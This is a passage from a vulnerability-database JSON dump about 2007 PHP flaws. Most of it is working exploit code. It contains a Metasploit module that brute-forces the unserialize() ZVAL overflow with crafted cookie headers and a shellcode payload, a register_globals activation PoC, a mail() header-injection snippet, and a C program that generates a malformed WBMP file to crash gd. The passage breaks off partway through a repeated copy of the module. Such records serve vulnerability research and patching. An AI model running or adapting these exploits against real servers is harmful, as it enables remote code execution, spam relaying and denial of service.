phpBB2',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'phpbb2mysql_data',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/phpBB2/faq.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*phpBB/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 
punBB',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'punbb_cookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*PunBB/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 WWWThreads',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'forum_cookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*WWWThreads/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 Deadman Redirect',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'authcookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/dmr/dmr.php',\r\n\t\t\t\t\t\t\t'Signature' => /document\\.f\\.userdata\\.focus/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 PhpWebGallery',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'pwg_remember',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/phpwebgallery/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*phpwebgallery/msi,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 
],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 Ariadne-CMS',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'ARCookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/ariadne/loader.php/',\r\n\t\t\t\t\t\t\t'Signature' => /Ariadne is free software/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 ProMA',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'proma',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/proma/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Change Account Information/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 eGroupware',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'eGW_remember',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/egroupware/login.php',\r\n\t\t\t\t\t\t\t'Signature' => /www.egroupware.org/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 04 
2007'))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [false, \"The path to vulnerable PHP script\"]),\r\n\t\t\t\t\tOptString.new('COOKIENAME', [false, \"The name of the cookie passed to unserialize()\"])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\tprint_status(\"Checking for a vulnerable PHP version...\")\r\n\r\n\t\t#\r\n\t\t# Pick the URI and Cookie name\r\n\t\t#\r\n\t\tcookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\r\n\t\turi_path = datastore['URI'] || target['DefaultURI']\r\n\r\n\t\tif(not cookie_name)\r\n\t\t\traise RuntimeError, \"The COOKIENAME option must be set\"\r\n\t\tend\r\n\r\n\t\tif(not uri_path)\r\n\t\t\traise RuntimeError, \"The URI option must be set\"\r\n\t\tend\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => uri_path,\r\n\t\t\t'method'\t => 'GET'\r\n\t\t}, 5)\r\n\r\n\t\tphp_bug = false\r\n\r\n\t\tif (not res)\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\thttp_fingerprint({ :response => res }) # check method\r\n\r\n\t\tif (res.code != 200)\r\n\t\t\tprint_status(\"The server returned #{res.code} #{res.message}\")\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tif (\r\n\t\t\t\t(res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\\/(.*)/) or\r\n\t\t\t\t(res.headers['Server'] and res.headers['Server'] =~ /PHP\\/(.*)/)\r\n\t\t\t)\r\n\r\n\t\t\tphp_raw = $1\r\n\t\t\tphp_ver = php_raw.split('.')\r\n\r\n\t\t\tif (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5)\r\n\t\t\t\tprint_status(\"The server runs a vulnerable version of PHP (#{php_raw})\")\r\n\t\t\t\tphp_bug = true\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"The server runs a non-vulnerable version of PHP (#{php_raw})\")\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Detect the phpBB cookie name\r\n\t\tif (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ 
/(.*)_(sid|data)=/)\r\n\t\t\tprint_status(\"The server may require a cookie name of '#{$1}_data'\")\r\n\t\tend\r\n\r\n\t\tif(target and target['Signature'])\r\n\t\t\tif (res.body and res.body.match(target['Signature']))\r\n\t\t\t\tprint_status(\"Detected target #{target.name}\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Did not detect target #{target.name}\")\r\n\t\t\tend\r\n\r\n\t\tend\r\n\r\n\t\treturn php_bug ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears\r\n\tend\r\n\r\n\r\n\tdef brute_exploit(target_addrs)\r\n\r\n\t\tzvalref = encode_semis('i:0;R:2;')\r\n\r\n#\r\n# Use this if we decide to do 'jmp edi' returns vs brute force\r\n#\r\n=begin\r\n\t\t# Linux specific egg-hunter\r\n\t\ttagger = \"\\x90\\x50\\x90\\x50\"\r\n\t\thunter =\r\n\t\t\t\"\\xfc\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\" +\r\n\t\t\t\"\\x3c\\xf2\\x74\\xf1\\xb8\" +\r\n\t\t\ttagger +\r\n\t\t\t\"\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\"\r\n\r\n\t\tegghunter = \"\\xcc\" * 39\r\n\t\tegghunter[0, hunter.length] = hunter\r\n\r\n\t\thashtable = \"\\xcc\" * 39\r\n\t\thashtable[0, 2] = \"\\xeb\\xc6\" # jmp back 32 bytes\r\n\r\n\t\thashtable[20, 4] = [target_addrs['Ret']].pack('V')\r\n\t\thashtable[32, 4] = [target_addrs['Ret']].pack('V')\r\n=end\r\n\r\n\t\t#\r\n\t\t# Just brute-force addresses for now\r\n\t\t#\r\n\t\ttagger = ''\r\n\t\tegghunter = rand_text_alphanumeric(39)\r\n\t\thashtable = rand_text_alphanumeric(39)\r\n\t\thashtable[20, 4] = [target_addrs['Ret']].pack('V')\r\n\t\thashtable[32, 4] = [target_addrs['Ret']].pack('V')\r\n\r\n\r\n\t\t#\r\n\t\t# Pick the URI and Cookie name\r\n\t\t#\r\n\t\tcookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\r\n\t\turi_path = datastore['URI'] || target['DefaultURI']\r\n\r\n\t\tif(not cookie_name)\r\n\t\t\traise RuntimeError, \"The COOKIENAME option must be set\"\r\n\t\tend\r\n\r\n\t\tif(not uri_path)\r\n\t\t\traise RuntimeError, \"The URI option must be set\"\r\n\t\tend\r\n\r\n\t\t# Generate and reuse the 
original buffer to save CPU\r\n\t\tif (not @saved_cookies)\r\n\r\n\t\t\t# Building the malicious request\r\n\t\t\tprint_status(\"Creating the request...\")\r\n\r\n\t\t\t# Create the first cookie header to get this started\r\n\t\t\tcookie_fun = \"Cookie: #{cookie_name}=\"\r\n\t\t\tcookie_fun << Rex::Text.uri_encode(\r\n\t\t\t\t'a:100000:{s:8:\"' +\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\t\t\t\t'\";a:3:{s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";a:1:{s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";i:0;}s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";'+\r\n\t\t\t\t'i:0;s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";i:0;}'\r\n\t\t\t)\r\n\t\t\tcookie_fun << zvalref * 500\r\n\t\t\tcookie_fun << Rex::Text.uri_encode('s:2:\"')\r\n\t\t\tcookie_fun << \"\\r\\n\"\r\n\r\n\t\t\trefcnt = 1000\r\n\t\t\trefmax = 65535\r\n\r\n\t\t\t# Keep adding cookie headers...\r\n\t\t\twhile(refcnt < refmax)\r\n\r\n\t\t\t\tchead = 'Cookie: ';\r\n\t\t\t\tchead << encode_semis('\";N;')\r\n\r\n\t\t\t\t# Stay within the 8192 byte limit\r\n\t\t\t\t0.upto(679) do |i|\r\n\t\t\t\t\tbreak if refcnt >= refmax\r\n\t\t\t\t\trefcnt += 1\r\n\r\n\t\t\t\t\tchead << zvalref\r\n\t\t\t\tend\r\n\t\t\t\tchead << encode_semis('s:2:\"')\r\n\t\t\t\tcookie_fun << chead + \"\\r\\n\"\r\n\t\t\tend\r\n\r\n\t\t\t# The final header, including the hashtable with return address\r\n\t\t\tcookie_fun << \"Cookie: \"\r\n\t\t\tcookie_fun << Rex::Text.uri_encode('\";N;')\r\n\t\t\tcookie_fun << zvalref * 500\r\n\r\n\t\t\t@saved_cookies = cookie_fun\r\n\t\tend\r\n\r\n\t\t# Generate and reuse the payload to save CPU time\r\n\t\tif (not @saved_payload)\r\n\t\t\t@saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256)\r\n\t\tend\r\n\r\n\t\tcookie_addrs = Rex::Text.uri_encode(\r\n\t\t\t's:39:\"' + egghunter + '\";s:39:\"'+ hashtable +'\";i:0;R:3;'\r\n\t\t) + \"\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying address 0x%.8x...\" % 
target_addrs['Ret'])\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => uri_path,\r\n\t\t\t'method'\t => 'POST',\r\n\t\t\t'raw_headers' => @saved_cookies + cookie_addrs,\r\n\t\t\t'data' => @saved_payload\r\n\t\t}, 1)\r\n\r\n\r\n\t\tif res\r\n\t\t\tfailed = false\r\n\r\n\t\t\tprint_status(\"Received a response: #{res.code} #{res.message}\")\r\n\r\n\t\t\tif (res.code != 200)\r\n\t\t\t\tprint_error(\"The server returned a non-200 response, indicating that the exploit failed.\")\r\n\t\t\t\tfailed = true\r\n\t\t\tend\r\n\r\n\t\t\tif (not failed and (res.body and res.body.length > 0))\r\n\t\t\t\tprint_error(\"The server returned a real response, indicating that the exploit failed.\")\r\n\t\t\t\tfailed = true\r\n\t\t\tend\r\n\r\n\t\t\tif (failed)\r\n\t\t\t\tprint_status(\"Please verify the URI and COOKIENAME parameters.\")\r\n\t\t\t\tprint_line('')\r\n\t\t\t\tprint_line(\"*\" * 40)\r\n\t\t\t\tprint_line(res.body)\r\n\t\t\t\tprint_line(\"*\" * 40)\r\n\t\t\t\tprint_line('')\r\n\r\n\t\t\t\traise RuntimeError, \"Exploit settings are probably wrong\"\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef encode_semis(str)\r\n\t\tstr.gsub(';') { |s| sprintf(\"%%%.2x\", s[0]) }\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16310/"}, {"lastseen": "2016-02-03T11:03:32", "bulletinFamily": "exploit", "description": "PHP 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness. CVE-2007-1583. 
Remote exploit for php platform", "modified": "2007-03-19T00:00:00", "published": "2007-03-19T00:00:00", "id": "EDB-ID:29752", "href": "https://www.exploit-db.com/exploits/29752/", "type": "exploitdb", "title": "PHP <= 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness", "sourceData": "source: http://www.securityfocus.com/bid/23016/info\r\n\r\nPHP is prone to a weakness that allows attackers to enable the 'register_globals' directive because the application fails to handle a memory-limit exception.\r\n\r\nEnabling the PHP 'register_globals' directive may allow attackers to further exploit latent vulnerabilities in PHP scripts.\r\n\r\nThis issue is related to the weakness found in the non-multibyte 'parse_str()' from BID 15249 - PHP Parse_Str Register_Globals Activation Weakness.\r\n\r\nThis issue affects PHP 4 to 4.4.6 and 5 to 5.2.1.\r\n\r\n<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP mb_parse_str() register_globals Activation Exploit //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // The following string will be parsed and will violate the memory_limit\r\n $str = \"a=\".str_repeat(\"A\", 164000);\r\n\r\n // This code just fills the memory up to the limit...\r\n $limit = ini_get(\"memory_limit\");\r\n if (strpos($limit, \"M\")) {\r\n $limit *= 1024 * 1024;\r\n } else if (strpos($limit, \"K\")) {\r\n $limit *= 
1024;\r\n } else $limit *=1;\r\n while ($limit - memory_get_usage(true) > 2048) $x[] = str_repeat(\"A\", 1024);\r\n\r\n // Will activate register_globals and trigger the memory_limit\r\n mb_parse_str($str);\r\n?>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29752/"}, {"lastseen": "2016-02-03T11:07:30", "bulletinFamily": "exploit", "description": "PHP 5.2.1 Folded Mail Headers Email Header Injection Vulnerability. CVE-2007-1717,CVE-2007-1718. Remote exploit for php platform", "modified": "2007-11-26T00:00:00", "published": "2007-11-26T00:00:00", "id": "EDB-ID:29784", "href": "https://www.exploit-db.com/exploits/29784/", "type": "exploitdb", "title": "PHP <= 5.2.1 Folded Mail Headers Email Header Injection Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/23145/info\r\n\r\nPHP is prone to an email-header-injection vulnerability because it fails to properly sanitize user-supplied input when constructing email messages.\r\n\r\nExploiting this issue allows a malicious user to create arbitrary email headers, and then create and transmit spam messages from the affected computer.\r\n\r\nThe following versions are vulnerable:\r\n\r\nPHP 4 up to and including 4.4.6\r\nPHP 5 up to and including 5.2.1\r\n\r\n<?php\r\n mail(\"test@domain(dot)com\", \"Test\\r\\n \\nAnother-Header: Blub\", \"Message\");\r\n?>", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/29784/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "There is an integer overflow in PHP in ext/gd/libgd/wbmp.c in the\r\nfunction readwbmp. 
If large enough values are specified for wbmp image\r\nheight and/or width, so that width*height > 2^32, an integer overflow\r\noccurs on the following line\r\n\r\nif ((wbmp->bitmap = (int *) safe_emalloc(wbmp->width * wbmp->height,\r\nsizeof(int), 0)) == NULL)\r\n\r\ncausing the amount of memory allocated to be smaller than the amount\r\nof data to be read, subsequently causing buffer overflow (See the DoS\r\nPoC below).\r\n\r\nUpon discovery, I first thought this to be a LibGD issue, however the\r\nfile wbmp.c is changed in LibGD (as early as in version 2.0.33\r\nreleased in 2004) and does not have this overflow.\r\n\r\nAs the only values written in memory upon exploiting this can be\r\n(int)0 and (int)1, exploiting this for anything other than DoS seems\r\nhighly unlikely.\r\n\r\nTimeline\r\n\r\nFeb 14 2007 - Vulnerability discovered\r\nMar 7 2007 - Vendor contacted\r\nMar 7 2007 - Vendor responded, confirmed the bug and said they plan to\r\nfix it in PHP 5.2.2, which is to be released in April\r\nApr 7 2007 - Release of this advisory\r\n\r\nNote: I was going to wait until the release of PHP 5.2.2 before\r\npublishing this, but seeing FrSIRT (and possibly others) already\r\npublished it I am pushing the release forward a bit.\r\n\r\nReferences\r\n\r\nhttp://www.php.net/\r\nhttp://ifsec.blogspot.com/2007/04/php-521-wbmp-file-handling-integer.html\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001\r\nhttp://www.frsirt.com/english/advisories/2007/1269\r\n\r\nPoC\r\n\r\n#define BUFSIZE 1000000\r\n\r\n#include <stdio.h>\r\n\r\nint main()\r\n{\r\n int c;\r\n char buf[BUFSIZE];\r\n\r\n FILE *fp = fopen(\"test.wbmp\",\"w\");\r\n\r\n //write header\r\n c = 0;\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n\r\n //write width = 2^32 / 4 + 1\r\n c = 0x84;\r\n fputc(c,fp);\r\n c = 0x80;\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n c = 0x01;\r\n fputc(c,fp);\r\n\r\n //write height = 4\r\n c = 0x04;\r\n fputc(c,fp);\r\n\r\n //write some data to cause overflow\r\n 
fwrite(buf,sizeof(buf),1,fp);\r\n\r\n fclose(fp);\r\n}\r\n\r\n\r\n<?php\r\n$image = imagecreatefromwbmp('test.wbmp'); //overflow occurs\r\n?>", "modified": "2007-04-08T00:00:00", "published": "2007-04-08T00:00:00", "id": "SECURITYVULNS:DOC:16620", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16620", "title": "PHP <= 5.2.1 wbmp file handling integer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Buffer overflow on WBMP image parsing.", "modified": "2007-04-08T00:00:00", "published": "2007-04-08T00:00:00", "id": "SECURITYVULNS:VULN:7545", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7545", "title": "PHP gd extension readwbmp() function integer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "Exceptional conditions during function invocation may lead to enabling register_globals.", "modified": "2007-03-22T00:00:00", "published": "2007-03-22T00:00:00", "id": "SECURITYVULNS:VULN:7450", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7450", "title": "mb_parse_str() exceptional conditions protection bypass", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "JIS fonts parsing problem in gdImageStringFTEx() function.", "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "id": "SECURITYVULNS:VULN:7131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7131", "title": "libgd graphics library code execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "16-bit counter overflow leads to ability of code execution on parsing cookie.", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "id": "SECURITYVULNS:VULN:7333", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7333", "title": "PHP unserialize() integer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "Infinite loop on 64-bit platforms.", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "id": "SECURITYVULNS:VULN:7279", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7279", "title": "PHP zend_hash_init function infinite loop", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Unfiltered \r\n and \0 characters allows strings injection and header truncation.", "modified": "2007-03-29T00:00:00", "published": "2007-03-29T00:00:00", "id": "SECURITYVULNS:VULN:7491", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7491", "title": "PHP mail() function invalid characters processing", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "metasploit": [{"lastseen": "2018-10-26T21:54:07", "bulletinFamily": "exploit", "description": "This module exploits an integer overflow vulnerability in the unserialize() function of the PHP web server extension. This vulnerability was patched by Stefan in version 4.5.0 and applies all previous versions supporting this function. This particular module targets numerous web applications and is based on the proof of concept provided by Stefan Esser. 
This vulnerability requires approximately 900k of data to trigger due the multiple Cookie headers requirement. Since we are already assuming a fast network connection, we use a 2Mb block of shellcode for the brute force, allowing quick exploitation for those with fast networks. One of the neat things about this vulnerability is that on x86 systems, the EDI register points into the beginning of the hashtable string. This can be used with an egghunter to quickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction is known. The EDI method is faster, but the bandwidth-intensive brute force used by this module is more reliable across a wider range of systems.", "modified": "2017-07-24T13:26:21", "published": "2007-05-07T04:48:45", "id": "MSF:EXPLOIT/MULTI/PHP/PHP_UNSERIALIZE_ZVAL_COOKIE", "href": "", "type": "metasploit", "title": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Brute\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)',\n 'Description' => %q{\n This module exploits an integer overflow vulnerability in the unserialize()\n function of the PHP web server extension. This vulnerability was patched by\n Stefan in version 4.5.0 and applies all previous versions supporting this function.\n This particular module targets numerous web applications and is based on the proof\n of concept provided by Stefan Esser. This vulnerability requires approximately 900k\n of data to trigger due the multiple Cookie headers requirement. 
Since we\n are already assuming a fast network connection, we use a 2Mb block of shellcode for\n the brute force, allowing quick exploitation for those with fast networks.\n\n One of the neat things about this vulnerability is that on x86 systems, the EDI register points\n into the beginning of the hashtable string. This can be used with an egghunter to\n quickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\n is known. The EDI method is faster, but the bandwidth-intensive brute force used by this\n module is more reliable across a wider range of systems.\n },\n 'Author' =>\n [\n 'hdm', # module development\n 'GML <grandmasterlogic[at]gmail.com>', # module development and debugging\n 'Stefan Esser <sesser[at]hardened-php.net>' # discovered, patched, exploited\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2007-1286'],\n ['OSVDB', '32771'],\n ['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024,\n },\n 'Platform' => %w{ linux },\n 'Targets' =>\n [\n\n #\n # 64-bit SuSE: 0x005c0000\n # Backtrack 2.0: 0xb797a000\n # Gentoo: 0xb6900000\n #\n [ 'Linux x86 Generic',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 phpBB2',\n {\n 'DefaultCookie' => 'phpbb2mysql_data',\n 'DefaultURI' => '/phpBB2/faq.php',\n 'Signature' => /Powered\\s+by.*phpBB/,\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ],\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xb6000400 },\n 'Stop' => { 'Ret' => 0xbfff0000 },\n 'Step' => 1024*1024\n }\n }\n ],\n [ 'Linux x86 punBB',\n {\n 'DefaultCookie' => 'punbb_cookie',\n 'DefaultURI' => '/index.php',\n 'Signature' => /Powered\\s+by.*PunBB/,\n 'Platform' => 